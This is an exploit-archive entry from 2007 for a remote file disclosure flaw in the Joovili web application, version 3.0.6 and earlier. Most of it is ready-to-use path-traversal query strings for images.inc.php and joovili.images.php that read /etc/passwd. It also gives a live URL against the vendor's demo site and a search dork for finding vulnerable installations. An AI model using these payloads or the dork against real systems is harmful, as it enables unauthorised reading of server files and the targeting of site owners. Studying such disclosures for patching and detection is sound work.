Joovili <= 3.0.6 (joovili.images.php) Remote File Disclosure Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Joovili <= 3.0.6 (joovili.images.php) Remote File Disclosure Vulnerability
# Published : 2007-12-27
# Author : EcHoLL
# Previous Title : ZeusCMS <= 0.3 Remote Blind SQL Injection Exploit
# Next Title : RunCMS 1.6 Remote Blind SQL Injection Exploit (IDS evasion)

found by EcHoLL
version: 2.***
include/images.inc.php?picture=../../../../../../../../etc/passwd&thumbnail=FALSE
include/images.inc.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE
 
version 3.**
joovili.images.php?picture=../../../../../../../..///etc/passwd&thumbnail=FALSE
joovili.images.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE
 
 
demo
http://demo.joovili.com/include/joovili.images.php?picture=../../../../../../../..///etc/passwd&thumbnail=FALSE
dork: powered by joovili

# www.Syue.com [2007-12-27]